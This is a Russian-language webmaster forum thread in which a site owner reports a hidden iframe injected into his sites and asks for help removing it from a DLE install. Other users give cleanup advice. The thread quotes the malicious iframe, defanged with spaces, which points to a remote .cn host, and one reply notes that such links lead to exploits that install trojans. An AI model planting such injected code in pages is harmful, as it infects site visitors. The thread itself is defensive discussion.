Нужна помощь за $ срочно

12
romasenco
На сайте с 04.01.2008
Offline
108
1212

Утром обнаружил что каким то образом пять сайтов (все на одном хосте) были изменены, то есть на морде добавлен код

</ html><iframe src="http:// thehomename .cn:8080/index. php" width=107 height=162 style="visibility: hidden"></ iframe>

(в примере я наставил пробелы чтоб вопросов не было)

На всех сайтах где не было админки я удалил код без проблем, а на одном (админка на DLE) удалить не могу. Подскажите срочно как это сделать. Готов оплатить подсказку.

вот ася 328781245

KingTime.RU
На сайте с 17.03.2009
Offline
19
#1

посмотрите в main.tpl (в шаблоне)

Требуется срочная помощь (/ru/forum/407822)- Сбор средств.
romasenco
На сайте с 04.01.2008
Offline
108
#2
KingTime.RU:
посмотрите в main.tpl (в шаблоне)

смотреть в main.tpl это просто, а так же через админку в разделе "Управление шаблонами" / "Общий макет страницы" все это я пробовал, но через них не виден этот код!

.:nbd:.
На сайте с 04.11.2008
Offline
98
#3

Дайте урл в ЛС, гляну.

Палю тему Дорген (/ru/forum/439165) + кеи + контент (http://datarama.biz/) + еще немного кеев и скриптов (http://amazingsoftware.ru/) = $$$ Мы делаем доры, а не пишем романы (c) один Дима рефка dino_spomoni (http://goo.gl/w62v3)
[Удален]
#4
romasenco:
Утром обнаружил что каким то образом пять сайтов (все на одном хосте) были изменены, то есть на морде добавлен код

</ html><iframe src="http:// thehomename .cn:8080/index. php" width=107 height=162 style="visibility: hidden"></ iframe>

(в примере я наставил пробелы чтоб вопросов не было)

На всех сайтах где не было админки я удалил код без проблем, а на одном (админка на DLE) удалить не могу. Подскажите срочно как это сделать. Готов оплатить подсказку.

вот ася 328781245

/ru/forum/358550

romasenco
На сайте с 04.01.2008
Offline
108
#5

спасибо большое, я отписался, но человек еще спит. А ложка дорога к обеду.

Буду искать дальше. Спасибо Вам

DukeNukem
На сайте с 19.03.2009
Offline
111
#6

Пишите в асю. Найдем и выловим ...

К блогерству есть интерес? Я поставлю вам Wordpress! В связи с кризисом в стране - я подвинусь по цене. Установка, настройка CMS. Обучение и сопровождение. ( /ru/forum/346576 )
relaxing
На сайте с 29.05.2008
Offline
25
#7

...........

TO
На сайте с 21.09.2007
Offline
170
#8

У меня такое было, куда-то утянули пароль от хостера и на все n сайтов поставили эту фигню. Я умаялся, пока все удалил. По собственному опыту могу сказать, что страдают только php файлы, то есть в худшем случае вам нужно будет просмотреть все php-файлы на сервере (можно в Zend Studio поставить поиск по содержимому файлов) и руками удалить. В лучшем - отделаетесь легким испугом и только файлом index.php.

Кстати, каков смысл действия этой заразы, кто-нибудь знает?

Korew
На сайте с 31.12.2007
Offline
195
#9

У меня такое было с одним сайтом на DLE. В main.tpl был. Удалял - появлялся заново. Потом вообще в рекламные материалы добавился такой код и вывод был в новостях (сверху, по центру и снизу). Потом поменял пароль фтп и вроде все ок.

S
На сайте с 22.04.2009
Offline
158
#10
t_o_x_a:
По собственному опыту могу сказать, что страдают только php файлы

Ифреймер пишет код в файл с любым расширением. Смотря какие расширения, названия (index, default, main, login и т.д.) файлов и директории прописаны в конфиге скрипта.

t_o_x_a:
Кстати, каков смысл действия этой заразы, кто-нибудь знает?

В 99% ссыль ведет на сплоит. А сплоит грузит троя на тачки юзеров.

Korew:
Потом поменял пароль фтп и вроде все ок.

Может быть и не все. Проверься на вирусы.

12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий